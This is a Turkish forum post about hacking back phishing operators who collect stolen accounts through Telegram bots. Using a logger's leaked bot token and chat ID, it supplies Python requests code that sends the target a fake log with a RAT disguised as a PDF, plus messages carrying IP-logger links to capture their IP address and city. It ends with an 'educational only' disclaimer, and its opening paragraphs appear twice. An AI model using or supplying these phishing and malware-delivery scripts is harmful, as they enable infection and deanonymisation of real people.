Telegram Logu Nedir?
Genellikle phishing amaçlı scriptlerin içine gömülen logtur. Siz kurbandan hesap düşürünce bu hesap hem sizin txt dosyanıza, hem de logcuya mesaj olarak gönderilir. Bunu anlamanın tek yolu tüm script dosyalarının kontrol edilmesidir. Veya şansa dayalı olarak telegram.php log.php gibi dosya isimleri bularak direk içine girerek de logu tespit edebilirsiniz. Peki, ofansif savunma nasıl yapacağız?
Öncelikle, botu oluşturan kişinin tek hedefi: "Logları çekmektir". Yani bota sadece bir mesaj komutu veriyor, bununla beraber bota mesaj gönderiyor. Peki, olayın derinine inelim.
Normal bir bot oluşturduğunuzda bir kişiye asla mesaj atamazsınız. O kişi bota mesaj atmadıysa asla mesaj gönderemezsiniz. Yani, saldırgan kendi oluşturduğu bota illaha ki mesaj gönderecektir. Biz bu açığı kullanarak rat yedirmeye veya işleri bozmaya çalışacağız.
Telegram API
Bu işi iki yolla halledeceğiz. APİ'yi webte veya kod yolu ile kullanarak. En kral yöntem kod kullanarak mesaj göndermektir. Bu sayede kurbanın oluşturduğu gibi bir mesajı kolayca taklit edebiliriz. Öncelikle, bu iş için @'CaptainKanka 'ya teşekkür ediyorum. LOG'u kendisi tespit etti ve tespit edilen logcu forumdan banlandı. Öncelikle size Telegram botundan bahsetmek istiyorum. Gelin kısaca bir bot oluşturalım.
"BotFather" adlı bota mesaj göndererek kısaca /newbot komutu ile bot oluşturuyoruz. Bot adı belirliyoruz ve iş bu kadar.
Botu oluşturduk ve bir token aldık. Bunu api ile beraber kullanabiliriz. t.me/OffSecDarkBot artık benim botum. Şimdi, botu bir test edelim. APİ kullanarak kendime mesaj yollayacağım. Lâkin önce bota /start yapıyorum ki kendime mesaj gönderebileyim. Botu test edelim. Python'un "telebot" package'ini kullanarak yapacağım.
Genellikle phishing amaçlı scriptlerin içine gömülen logtur. Siz kurbandan hesap düşürünce bu hesap hem sizin txt dosyanıza, hem de logcuya mesaj olarak gönderilir. Bunu anlamanın tek yolu tüm script dosyalarının kontrol edilmesidir. Veya şansa dayalı olarak telegram.php log.php gibi dosya isimleri bularak direk içine girerek de logu tespit edebilirsiniz. Peki, ofansif savunma nasıl yapacağız?
Öncelikle, botu oluşturan kişinin tek hedefi: "Logları çekmektir". Yani bota sadece bir mesaj komutu veriyor, bununla beraber bota mesaj gönderiyor. Peki, olayın derinine inelim.
Normal bir bot oluşturduğunuzda bir kişiye asla mesaj atamazsınız. O kişi bota mesaj atmadıysa asla mesaj gönderemezsiniz. Yani, saldırgan kendi oluşturduğu bota illaha ki mesaj gönderecektir. Biz bu açığı kullanarak rat yedirmeye veya işleri bozmaya çalışacağız.
Telegram API
Bu işi iki yolla halledeceğiz. APİ'yi webte veya kod yolu ile kullanarak. En kral yöntem kod kullanarak mesaj göndermektir. Bu sayede kurbanın oluşturduğu gibi bir mesajı kolayca taklit edebiliriz. Öncelikle, bu iş için @'CaptainKanka 'ya teşekkür ediyorum. LOG'u kendisi tespit etti ve tespit edilen logcu forumdan banlandı. Öncelikle size Telegram botundan bahsetmek istiyorum. Gelin kısaca bir bot oluşturalım.
"BotFather" adlı bota mesaj göndererek kısaca /newbot komutu ile bot oluşturuyoruz. Bot adı belirliyoruz ve iş bu kadar.
Botu oluşturduk ve bir token aldık. Bunu api ile beraber kullanabiliriz. t.me/OffSecDarkBot artık benim botum. Şimdi, botu bir test edelim. APİ kullanarak kendime mesaj yollayacağım. Lâkin önce bota /start yapıyorum ki kendime mesaj gönderebileyim. Botu test edelim. Python'un "telebot" package'ini kullanarak yapacağım.
Python:
import telebot
bot = telebot.TeleBot("tokenininz")
@bot.message_handler(commands=['basla', 'yardim'])
def send_welcome(message):
bot.reply_to(message, "Selam")
@bot.message_handler(func=lambda message: True)
def echo_all(message):
bot.reply_to(message, message.text)
bot.infinity_polling()Evet, şimdi /basla komutunu test edelim.
Evet, gördüğünüz üzere bot çalışıyor. Kodlarda her hangi bir sıkıntı yok. Basitçe /basla komutu yazınca mesaj yollayabildik. Şimdi artık bot olarak kendimize mesaj gönderebiliriz. APİ Burada devreye giriyor.
Telegram Api
Kısaca, url ile api yolunu kullanabiliriz. Burada size bir victim gözüyle bakıldığını düşünün, siz de ofansif savunucusunuz. Gelin bir not bırakalım. Ondan önce apiyi tanımalıyız.
adresinden "Available Methods" yani kullanılabilir methodları görüntüleyebiliriz. İrdelersek bir çok yöntemin mevcut olduğunu görürüz. Yani bu bizim işimize çok fazla yarayacak. Şimdilik URL ile bir mesaj yollamayı deneyelim.
Öncelikle apiyi kullanmak için api.telegram.org üzerinden hareket edeceğiz. / ile bot{token} belirteceğiz. Örnek URL kullanımı:
bot3812894394392493024932423 yazan kısma kendi tokenimizi yazalım ve chat id kısmına da kendi chat idmizi yazalım.
Chat id bulmak için:
Get Chat ID BOT telegram botunu kullanabilirsiniz. Gelin bir test edelim. : )
Gördüğünüz gibi, APİ başarılı oldu ve mesaj döndürüldü.
Şimdi APİ kullanımını çok rahat bir şekilde çözdüğümüzü düşünüyorum. Yalnız tekrar söyleyeyim; bota mesaj atmadıysanız api başarısız döndürülecektir. Yani bota mesaj atmayan bir kişinin USER ID'ini verirseniz işlem başarısız olur. Ehh artık işin güzel kısmına geçelim.
CaptainKanka'nın bulduğu logcunun botunun ve idsinin bilgileri burada:
1 Numaralı Kısım: Logcunun kullandığı botun tokeni
2 Numaralı Kısım: Logcunun Chat ID'si
3 Numaralı Kısım: Logcunun kendine gönderdiği log mesajı
(Bide kalp koymuş püüüüü)
Evet, gerekli bilgileri aldık. Artık ofansif savunmaya geçelim. Şimdi 2 yol izleyebiliriz:
1 - Rat Yedirmek
2 - IP Adresi ve Yaşadığı Şehri Ele Geçirmek
1 - Rat Yedirmek
Tahmin ettiğiniz gibi, kişiye sahte log göndererek bu işlemi gerçekleştireceğiz. Başarı oranı düşük, yakalanmadı en kötü bir mesaj yollar bitirirsiniz işi.
Bunun için basit bir kod hazırlayalım. APİ yolu ile mesaj göndereceğiz. Şimdi bunun için python v.s. uğraşmaya hiç gerek yok. Attığım adresin sağ tarafında kendi kendini çalıştıran hazır bir komut bulunmakta.
sendMessage adresinden shell'in üst kısmında bulunan Language'i üç noktadan Python'a ayarlayalım. Kodları ben kopyalayıp kendi kod okuyucumda çalıştıracağım. Texti logcunun yaptığı gibi ayarlıyorum.
Bir kaç denemenin ardından (request bilgim olmadığı için) kodu hazırlayabildim ve mesajın çıktısını başarılı olarak gönderebildim.
Evet, şimdi son bir kaç dokunuş yapacağız.
Şimdi bir virüs hazırladık varsayalım. Log.bat adında, bunu mesaja entegre edeceğiz. GIF, PDF ve ZIP yapabildiğimizi öğrendim. Bu durumda virüsü PDF'e çeviriyorum.
Şimdi discord yardımı ile document yollayacağız. Öncelikle virüsümü yan hesaba yollayıp "cdn" urlsini kopyalıyorum.
Artık pek bir işlem kalmadı. Şimdi mesaj ile PDF'i birleşip kurbana göndermem lazım.
ve evet. Kod yapımız çalıştı ve mesaj gönderildi. Kesinlik yok, tamamen phishing. Düşerse şansınıza.
Python Kodunun Tam Hâli:
Python:
import requests
url = "https://api.telegram.org/bot47347923953725tokenfelanfilan/sendDocument"
payload = {
"document": "pdfdosyasi",
"caption": "mesaj", # \n kullanarak boşluk bırakabilirsiniz.
"disable_notification": False,
"reply_to_message_id": 0,
"chat_id": "logcuid"
}
headers = {
"accept": "application/json",
"X-Requested-With": "XMLHttpRequest",
"content-type": "application/json"
}
response = requests.post(url, json=payload, headers=headers)
print(response.text)2. Adım - IP & Şehir Ele Geçirme
a) İpLogger:
Kısaca mesajın içine iplogger ekleyeceksiniz. Ekstra olarak website: iploglink eklerseniz bu da diğer bir oltalama yöntemi olur. Örnek kod:
Python:
import requests
url = "https://api.telegram.org/bot47347923953725tokenfelanfilan/sendMessage"
payload = {
"text": "useridfelanfilan\nWebsite: iploggerlink",
"disable_web_page_preview": False,
"disable_notification": False,
"reply_to_message_id": 0,
"chat_id": "logcuid"
}
headers = {
"accept": "application/json",
"X-Requested-With": "XMLHttpRequest",
"content-type": "application/json"
}
response = requests.post(url, json=payload, headers=headers)
print(response.text)b) Instagram Kullanarak:
Bot takipçiye sahip olan hesabınız varsa bilgileri verebilir, giriş yaptığı anda ip adresini elinize geçirebilirsiniz. Bunlar hakkında pek bir şey söylememe gerek yok, zaten benden iyi biliyorsunuzdur.
Kısaca olay bu kadar,
Kodda Destek Olan: @Ɲémesis hocama,
Dosyaları Bulan: @'CaptainKanka 'ya tekrardan teşekkür ediyorum.
Herkese iyi forumlar.
- Blue Team -
NOT: Bu iş kimsenin üzerinde denenmemiştir. Konu tamamen eğitim ve savunma amaçlıdır.
Son düzenleme:
